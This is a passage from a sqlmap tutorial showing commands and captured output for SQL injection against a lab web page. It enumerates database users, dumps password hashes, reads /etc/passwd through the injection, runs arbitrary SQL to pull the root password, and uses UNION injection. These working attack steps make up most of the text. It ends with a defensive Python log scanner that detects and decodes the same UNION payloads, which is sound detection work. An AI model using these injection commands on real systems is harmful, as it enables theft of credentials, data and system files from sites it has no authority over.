python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --current-db

current database: 'testdb'


python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --users

database management system users [5]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'leboyer'
[*] 'root'@'localhost'
[*] 'testuser'@'localhost'


python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --passwords

database management system users password hashes:
[*] debian-sys-maint [1]:
    password hash: *XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[*] root [1]:
    password hash: *YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY
[*] testuser [1]:
    password hash: *ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ


python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --dbs

available databases [3]:
[*] information_schema
[*] mysql
[*] testdb


python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --tables -D "information_schema"

Database: information_schema
[16 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLLATIONS                            |
| COLUMN_PRIVILEGES                     |
| COLUMNS                               |
| KEY_COLUMN_USAGE                      |
| ROUTINES                              |
| SCHEMA_PRIVILEGES                     |
| SCHEMATA                              |
| STATISTICS                            |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TABLES                                |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+


python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --columns -T "user" -D "mysql"

Database: mysql
Table: user
[37 columns]
+-----------------------+------+
| Column                | Type |
+-----------------------+------+
| Alter_priv            | enum |
| Alter_routine_priv    | enum |
| Create_priv           | enum |
| Create_routine_priv   | enum |
| Create_tmp_table_priv | enum |
| Create_user_priv      | enum |
| Create_view_priv      | enum |
| Delete_priv           | enum |
| Drop_priv             | enum |
| Execute_priv          | enum |
| File_priv             | enum |
| Grant_priv            | enum |
| Host                  | char |
| Index_priv            | enum |
| Insert_priv           | enum |
| Lock_tables_priv      | enum |
| max_connections       | int  |
| max_questions         | int  |
| max_updates           | int  |
| max_user_connections  | int  |
| Password              | char |
| Process_priv          | enum |
| References_priv       | enum |
| Reload_priv           | enum |
| Repl_client_priv      | enum |
| Repl_slave_priv       | enum |
| Select_priv           | enum |
| Show_db_priv          | enum |
| Show_view_priv        | enum |
| Shutdown_priv         | enum |
| ssl_cipher            | blob |
| ssl_type              | enum |
| Super_priv            | enum |
| Update_priv           | enum |
| User                  | char |
| x509_issuer           | blob |
| x509_subject          | blob |
+-----------------------+------+


13. Display the contents of a specified file (generally used with PHP).

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --file /etc/passwd

/etc/passwd:
---
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/false
backup:x:34:34:backup:/var/backups:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
mysql:x:104:105:MySQL Server,,,:/var/lib/mysql:/bin/false
postgres:x:105:107:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
inquis:x:1000:100:Bernardo Damele,,,:/home/inquis:/bin/bash
---


14. Execute your own SQL statement.

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -e "SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1"

[hh:mm:18] [INFO] fetching expression output: 'SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1'
[hh:mm:18] [INFO] query: SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1
[hh:mm:18] [INFO] retrieved: YYYYYYYYYYYYYYYY
[hh:mm:19] [INFO] performed 118 queries in 0 seconds
SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1: 'YYYYYYYYYYYYYYYY'


15. UNION injection

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --union-check

valid union: 'http://192.168.1.47/page.php?id=1 UNION ALL SELECT NULL, NULL, NULL--&cat=2'


python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 --union-use --banner

[...]
[hh:mm:24] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:24] [INFO] the target url could be affected by an inband sql injection vulnerability
[hh:mm:24] [INFO] confirming inband sql injection on parameter 'id'
[...]
[hh:mm:24] [INFO] fetching banner
[hh:mm:24] [INFO] request: http://192.168.1.47/page.php?id=1 UNION ALL SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), VERSION(), CHAR(95,95,83,84,79,80,95,95)), NULL, NULL--&cat=2
[hh:mm:24] [INFO] performed 1 queries in 0 seconds
banner: '5.0.38-Ubuntu_0ubuntu1.1-log'


16. Save the injection session to a file, and restore it from that file later. This is very convenient and one of the tool's major features: you can interrupt an injection and continue it when you have time.

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -b -o "sqlmap.log"

[...]
[hh:mm:09] [INFO] fetching banner
[hh:mm:09] [INFO] query: VERSION()
[hh:mm:09] [INFO] retrieved: 5.0.30-Debian_3-log
[hh:mm:11] [INFO] performed 139 queries in 1 seconds
banner: '5.0.38-Ubuntu_0ubuntu1.1-log'


python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 --banner -o "sqlmap.log" --resume

[...]
[hh:mm:13] [INFO] fetching banner
[hh:mm:13] [INFO] query: VERSION()
[hh:mm:13] [INFO] retrieved the length of query: 26
[hh:mm:13] [INFO] resumed from file 'sqlmap.log': 5.0.45-Deb
[hh:mm:13] [INFO] retrieved: ian_1ubuntu3-log
banner:
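On the server side, the UNION probes shown in section 15 leave a distinctive trace in the web access log: a parameter value containing "UNION ALL SELECT NULL, ..." and, when the banner is fetched, CHAR() lists that decode to the __START__ and __STOP__ marker strings wrapping VERSION(). The following Python script is an added example for defenders, not part of the original tutorial or of sqlmap; it scans constructed access-log lines (sample input, not captured from any real system) for that pattern and decodes the CHAR() calls so the markers are readable.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines shaped like the probes in section 15
# (sample data, not from a real server).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /page.php?id=1&cat=2 HTTP/1.1" 200 512
10.0.0.5 - - [10/Oct/2023:13:55:37 +0000] "GET /page.php?id=1%20UNION%20ALL%20SELECT%20NULL,%20NULL,%20NULL--&cat=2 HTTP/1.1" 200 512
10.0.0.5 - - [10/Oct/2023:13:55:38 +0000] "GET /page.php?id=1%20UNION%20ALL%20SELECT%20CONCAT(CHAR(95,95,83,84,65,82,84,95,95),%20VERSION(),%20CHAR(95,95,83,84,79,80,95,95)),%20NULL,%20NULL--&cat=2 HTTP/1.1" 200 540
"""

UNION_RE = re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.IGNORECASE)
CHAR_RE = re.compile(r"CHAR\(\s*([\d\s,]+)\)", re.IGNORECASE)
# Common Log Format: client, ident, user, [timestamp], "METHOD target HTTP/x"
REQ_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (?P<target>\S+) HTTP/'
)


def decode_char_calls(expr):
    """Replace each CHAR(n, n, ...) with the string it builds, so that the
    __START__/__STOP__ markers around VERSION() become visible."""
    return CHAR_RE.sub(
        lambda m: "".join(chr(int(n)) for n in m.group(1).split(",")), expr
    )


def scan_log(text):
    """Return one finding per query parameter whose value carries a UNION SELECT."""
    findings = []
    for line in text.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue  # not a request line we understand
        query = urlsplit(m.group("target")).query
        # parse_qsl percent-decodes the values, so %20 becomes a space
        for name, value in parse_qsl(query, keep_blank_values=True):
            if not UNION_RE.search(value):
                continue
            decoded = decode_char_calls(value)
            findings.append({
                "client": m.group("client"),
                "param": name,
                "decoded": decoded,
                "markers": re.findall(r"__[A-Z]+__", decoded),
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["client"], f["param"], f["markers"], f["decoded"])
```

Feeding real access logs through scan_log() is enough to spot the column-count probe and the marker-wrapped banner fetch; the decoded payload also shows which parameter the injection rides on.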